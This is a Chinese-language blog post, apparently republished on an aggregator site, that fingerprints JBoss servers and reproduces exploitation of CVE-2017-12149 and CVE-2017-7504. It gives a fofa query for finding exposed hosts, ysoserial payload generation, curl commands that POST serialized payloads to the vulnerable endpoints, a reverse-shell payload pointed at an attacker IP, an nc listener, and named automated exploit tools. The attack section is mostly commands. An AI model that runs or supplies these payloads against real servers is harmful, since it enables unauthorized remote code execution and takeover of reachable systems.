当前位置: 首页 > news >正文

JBoss中间件特征及漏洞复现

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

Web特征

其默认页在8080端口(可变),welcome界面:

image-20251123153754473

该产品存在标签页icon图标:image-20251123153854715

在欢迎界面可以看到有管理接口的相关入口:

image-20251123154045315

进入后经过身份验证后即可进入管理界面。

fofa语法:title="Welcome to JBoss AS"title="Welcome to JBoss AS" && port="8080"

漏洞复现

CVE-2017-12149(反序列化)

此漏洞由于HttpInvoker组件中的ReadOnlyAccessFilter过滤器在未进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

主要问题出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

image-20251123154621143

影响范围:JBoss AS 5.x、JBoss AS 6.x

复现示例

**这里使用常规Java反序列化漏洞测试方法来复现该漏洞。*

此漏洞利用有两种方法:

法一:手工构造命令

1、编写并处理反弹shell的命令

反弹shell需要使用bash,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,所以需要用进行一次编码。

工具:runtime-exec-payloads

image-20251123155640888

2、序列化数据生成恶意文件

使用ysoserial来复现生成序列化数据,由于目标使用的Java版本较新,所以选择使用的gadget是CommonsCollections5(CC5):

PS:实战时由于适用范围广所以CC5\CC6均可尝试。

java -jar ysoserial.jar CommonsCollections5 "<上一步编码后的指令>" > poc.ser
image-20251123161330576

3、发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:

PS:数据包中Content-Type要改成:application/data,并在下方空白处选择“从文件粘贴”。

可以通过bp也可以通过curl命令,这里使用curl成功,bp由于未知原因失败了:

curl -X POST http://target-ip:8080/invoker/readonly -H "Content-Type: application/x-java-serialized-object" --data-binary "@poc.ser"
image-20251123163153952

法二:通过自动化利用工具

工具1:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具

image-20251123164655159

工具2:JBoss-CVE-2017-12149检测利用工具

image-20251123164809527image-20251123164907013

CVE-2017-7504(JBossMQ JMS 反序列化)

在JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响范围:JBoss 4.x

复现示例

此漏洞依然是两种方法进行复现:

法一:手工命令

*注意要使用java8

通过借助JavaDeserH2HC生成的POC来复现。生成Payload:

javac8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
image-20251123171209364

设置接收shell的ip和端口:

java8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口
image-20251123171519992

开启监听:

nc -lvvp 监听端口

因为此漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,所以将payload发送到该接口(在poc目录下执行):

curl http://target-IP:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser
image-20251123172755907

法二:自动化工具

工具:集成天狐渗透工具箱-社区版V2.0纪念版/JBoss漏洞检测利用工具

image-20251123172958321image-20251123173017526

http://www.jsqmd.com/news/58131/

相关文章:

  • Grafana监控平台特征及漏洞复现
  • SSM工商行政许可信息爬取及展示专业的系统es06d(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • 2025年十大资质齐全的地磅厂家排行榜,优质生产商及来样定制
  • 喷塑企业靠不靠谱?常州思尔利实力强
  • 大华摄像头系统特征及漏洞探测利用
  • 大华DSS系统特征及漏洞探测利用
  • 畅捷通系统特征及漏洞探测利用
  • 海康威视iVMS系统特征及漏洞探测利用
  • 海康威视摄像头系统特征及漏洞探测利用
  • 帆软报表FineReport系统特征及漏洞探测利用
  • 泛微OA系统特征及漏洞探测利用
  • 金和OA系统特征及漏洞探测利用
  • 2025年河北公职考试培训优质品牌推荐:仕登科全阶段备考服务 高校合作保障,助力考生稳上岸!
  • 若依OA系统特征及漏洞探测利用
  • 随机动量梯度法的末点收敛性分析
  • 海康威视综合安防管理平台特征及漏洞探测利用
  • 2025年优质供应链云平台TOP10,实现全链路数字化!财务云/供应链云/易代账/用友 T3/协同云/制造云/好业财供应链云产品选哪家
  • git项目管理idea
  • 2025年靠谱的楼梯护栏厂家、玻璃护栏厂家排行榜,精选推荐5
  • JavaScript获取鼠标点一个元素,获取鼠标点击的元素内的位置
  • 2025年中国实验室用气密性检测仪十大靠谱生产商推荐
  • 主席树板子
  • 2025年精选机床钣金外壳优质供应商排名,折弯机床钣金外壳推荐排行睿意达市场认可度高
  • 2025年尼龙挡圈加工厂排名:尼龙挡圈加工厂选哪家好
  • 气密性检漏仪精品定制TOP5权威推荐:甄选供应企业与大型厂家
  • 纵向关系和横向关系,前者是毒药
  • AI浏览器Comet用户体验测试
  • 2025年河北尼龙垫板认证厂家十大排行榜,专业供应商批量定制
  • 2025年西南地区实力强诚信专业的移民中介品牌企业TOP5推
  • 2025 ECUDesk V1.3.0.0: Multi-Function Software for EU/US EGR, DPF, SCR DTC OFF